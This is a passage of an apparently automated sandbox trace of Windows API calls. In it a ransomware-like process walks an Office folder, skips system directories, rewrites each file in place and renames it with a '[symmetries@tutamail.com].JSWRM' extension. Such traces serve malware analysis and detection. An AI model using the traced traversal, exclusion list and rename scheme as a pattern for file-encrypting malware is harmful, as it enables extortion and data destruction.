Office\\root\\Office16\\CONVERT\\1033\\OLAPPTR.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\olapptr.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.273] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=13472) returned 1 [0129.273] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.274] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x34a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x34a0, lpOverlapped=0x0) returned 1 [0129.275] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.276] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x34a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x34a0, lpOverlapped=0x0) returned 1 [0129.276] CloseHandle (hObject=0x314) returned 1 [0129.276] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\OLAPPTR.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\olapptr.fae"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\OLAPPTR.FAE.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\olapptr.fae.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.277] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1b359a5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1b359a5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1b359a5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3098, dwReserved0=0x60002, dwReserved1=0x225538, cFileName="OLJRNLR.FAE", cAlternateFileName="")) returned 1 [0129.277] lstrcmpiW (lpString1="OLJRNLR.FAE", lpString2=".") returned 1 [0129.277] lstrcmpiW (lpString1="OLJRNLR.FAE", lpString2="..") returned 1 [0129.277] lstrcmpiW (lpString1="OLJRNLR.FAE", lpString2="...") returned 1 [0129.277] lstrcmpiW (lpString1="OLJRNLR.FAE", lpString2="windows") returned -1 [0129.277] lstrcmpiW (lpString1="OLJRNLR.FAE", lpString2="recovery") returned -1 [0129.277] lstrcmpiW (lpString1="OLJRNLR.FAE", lpString2="perflogs") returned -1 [0129.277] lstrcmpiW (lpString1="OLJRNLR.FAE", lpString2="documents and settings") returned 1 [0129.277] lstrcmpiW (lpString1="OLJRNLR.FAE", lpString2="$RECYCLE.BIN") returned 1 [0129.277] lstrcmpiW (lpString1="OLJRNLR.FAE", lpString2="system volume information") returned -1 [0129.277] lstrcmpiW (lpString1="OLJRNLR.FAE", lpString2="msocache") returned 1 [0129.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLJRNLR.FAE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLJRNLR.FAE", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLJRNLR.FAE", lpUsedDefaultChar=0x0) returned 11 [0129.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLJRNLR.FAE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLJRNLR.FAE", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLJRNLR.FAE", lpUsedDefaultChar=0x0) returned 11 [0129.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\OLJRNLR.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\oljrnlr.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.278] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12440) returned 1 [0129.278] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.278] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3090, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x3090, lpOverlapped=0x0) returned 1 [0129.280] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.280] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3090, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x3090, lpOverlapped=0x0) returned 1 [0129.281] CloseHandle (hObject=0x314) returned 1 [0129.281] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\OLJRNLR.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\oljrnlr.fae"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\OLJRNLR.FAE.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\oljrnlr.fae.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.282] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf12b7378, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf12b7378, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf12dd5ae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2af0, dwReserved0=0x60002, dwReserved1=0x225538, cFileName="OLMAILR.FAE", cAlternateFileName="")) returned 1 [0129.282] lstrcmpiW (lpString1="OLMAILR.FAE", lpString2=".") returned 1 [0129.282] lstrcmpiW (lpString1="OLMAILR.FAE", lpString2="..") returned 1 [0129.282] lstrcmpiW (lpString1="OLMAILR.FAE", lpString2="...") returned 1 [0129.282] lstrcmpiW (lpString1="OLMAILR.FAE", lpString2="windows") returned -1 [0129.282] lstrcmpiW (lpString1="OLMAILR.FAE", lpString2="recovery") returned -1 [0129.282] lstrcmpiW (lpString1="OLMAILR.FAE", lpString2="perflogs") returned -1 [0129.282] lstrcmpiW (lpString1="OLMAILR.FAE", lpString2="documents and settings") returned 1 [0129.282] lstrcmpiW (lpString1="OLMAILR.FAE", lpString2="$RECYCLE.BIN") returned 1 [0129.282] lstrcmpiW (lpString1="OLMAILR.FAE", lpString2="system volume information") returned -1 [0129.282] lstrcmpiW (lpString1="OLMAILR.FAE", lpString2="msocache") returned 1 [0129.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLMAILR.FAE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLMAILR.FAE", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLMAILR.FAE", lpUsedDefaultChar=0x0) returned 11 [0129.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLMAILR.FAE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLMAILR.FAE", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLMAILR.FAE", lpUsedDefaultChar=0x0) returned 11 [0129.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.282] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\OLMAILR.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\olmailr.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.283] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=10992) returned 1 [0129.283] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.283] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2af0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x2af0, lpOverlapped=0x0) returned 1 [0129.285] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.285] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2af0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x2af0, lpOverlapped=0x0) returned 1 [0129.285] CloseHandle (hObject=0x314) returned 1 [0129.285] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\OLMAILR.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\olmailr.fae"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\OLMAILR.FAE.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\olmailr.fae.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.286] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4cd4a32, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4cd4a32, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4cd4a32, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e90, dwReserved0=0x60002, dwReserved1=0x225538, cFileName="OLNOTER.FAE", cAlternateFileName="")) returned 1 [0129.286] lstrcmpiW (lpString1="OLNOTER.FAE", lpString2=".") returned 1 [0129.286] lstrcmpiW (lpString1="OLNOTER.FAE", lpString2="..") returned 1 [0129.286] lstrcmpiW (lpString1="OLNOTER.FAE", lpString2="...") returned 1 [0129.286] lstrcmpiW (lpString1="OLNOTER.FAE", lpString2="windows") returned -1 [0129.286] lstrcmpiW (lpString1="OLNOTER.FAE", lpString2="recovery") returned -1 [0129.286] lstrcmpiW (lpString1="OLNOTER.FAE", lpString2="perflogs") returned -1 [0129.286] lstrcmpiW (lpString1="OLNOTER.FAE", lpString2="documents and settings") returned 1 [0129.286] lstrcmpiW (lpString1="OLNOTER.FAE", lpString2="$RECYCLE.BIN") returned 1 [0129.286] lstrcmpiW (lpString1="OLNOTER.FAE", lpString2="system volume information") returned -1 [0129.287] lstrcmpiW (lpString1="OLNOTER.FAE", lpString2="msocache") returned 1 [0129.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLNOTER.FAE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLNOTER.FAE", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLNOTER.FAE", lpUsedDefaultChar=0x0) returned 11 [0129.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLNOTER.FAE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLNOTER.FAE", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLNOTER.FAE", lpUsedDefaultChar=0x0) returned 11 [0129.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.287] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\OLNOTER.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\olnoter.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.288] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=11920) returned 1 [0129.288] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.288] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2e90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x2e90, lpOverlapped=0x0) returned 1 [0129.290] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.290] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2e90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x2e90, lpOverlapped=0x0) returned 1 [0129.290] CloseHandle (hObject=0x314) returned 1 [0129.290] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\OLNOTER.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\olnoter.fae"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\OLNOTER.FAE.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\olnoter.fae.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.291] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0089415, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf00d5872, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x48d8, dwReserved0=0x60002, dwReserved1=0x225538, cFileName="OLR.SAM", cAlternateFileName="")) returned 1 [0129.291] lstrcmpiW (lpString1="OLR.SAM", lpString2=".") returned 1 [0129.291] lstrcmpiW (lpString1="OLR.SAM", lpString2="..") returned 1 [0129.291] lstrcmpiW (lpString1="OLR.SAM", lpString2="...") returned 1 [0129.291] lstrcmpiW (lpString1="OLR.SAM", lpString2="windows") returned -1 [0129.291] lstrcmpiW (lpString1="OLR.SAM", lpString2="recovery") returned -1 [0129.291] lstrcmpiW (lpString1="OLR.SAM", lpString2="perflogs") returned -1 [0129.291] lstrcmpiW (lpString1="OLR.SAM", lpString2="documents and settings") returned 1 [0129.291] lstrcmpiW (lpString1="OLR.SAM", lpString2="$RECYCLE.BIN") returned 1 [0129.291] lstrcmpiW (lpString1="OLR.SAM", lpString2="system volume information") returned -1 [0129.291] lstrcmpiW (lpString1="OLR.SAM", lpString2="msocache") returned 1 [0129.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLR.SAM", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0129.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLR.SAM", cchWideChar=7, lpMultiByteStr=0x345e870, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLR.SAM", lpUsedDefaultChar=0x0) returned 7 [0129.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLR.SAM", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0129.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLR.SAM", cchWideChar=7, lpMultiByteStr=0x345e840, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLR.SAM", lpUsedDefaultChar=0x0) returned 7 [0129.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.292] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\OLR.SAM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\olr.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.292] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=18648) returned 1 [0129.292] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.292] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x48d0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x48d0, lpOverlapped=0x0) returned 1 [0129.306] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.306] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x48d0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x48d0, lpOverlapped=0x0) returned 1 [0129.306] CloseHandle (hObject=0x314) returned 1 [0129.306] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\OLR.SAM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\olr.sam"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\OLR.SAM.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\olr.sam.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.308] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xed25796c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed25796c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xed388c20, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3290, dwReserved0=0x60002, dwReserved1=0x225538, cFileName="OLTASKR.FAE", cAlternateFileName="")) returned 1 [0129.308] lstrcmpiW (lpString1="OLTASKR.FAE", lpString2=".") returned 1 [0129.308] lstrcmpiW (lpString1="OLTASKR.FAE", lpString2="..") returned 1 [0129.308] lstrcmpiW (lpString1="OLTASKR.FAE", lpString2="...") returned 1 [0129.308] lstrcmpiW (lpString1="OLTASKR.FAE", lpString2="windows") returned -1 [0129.308] lstrcmpiW (lpString1="OLTASKR.FAE", lpString2="recovery") returned -1 [0129.308] lstrcmpiW (lpString1="OLTASKR.FAE", lpString2="perflogs") returned -1 [0129.308] lstrcmpiW (lpString1="OLTASKR.FAE", lpString2="documents and settings") returned 1 [0129.308] lstrcmpiW (lpString1="OLTASKR.FAE", lpString2="$RECYCLE.BIN") returned 1 [0129.308] lstrcmpiW (lpString1="OLTASKR.FAE", lpString2="system volume information") returned -1 [0129.308] lstrcmpiW (lpString1="OLTASKR.FAE", lpString2="msocache") returned 1 [0129.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLTASKR.FAE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLTASKR.FAE", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLTASKR.FAE", lpUsedDefaultChar=0x0) returned 11 [0129.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLTASKR.FAE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLTASKR.FAE", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLTASKR.FAE", lpUsedDefaultChar=0x0) returned 11 [0129.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.308] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\OLTASKR.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\oltaskr.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.309] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12944) returned 1 [0129.309] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.309] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3290, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x3290, lpOverlapped=0x0) returned 1 [0129.311] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.311] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3290, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x3290, lpOverlapped=0x0) returned 1 [0129.312] CloseHandle (hObject=0x314) returned 1 [0129.312] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\OLTASKR.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\oltaskr.fae"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\OLTASKR.FAE.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\oltaskr.fae.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 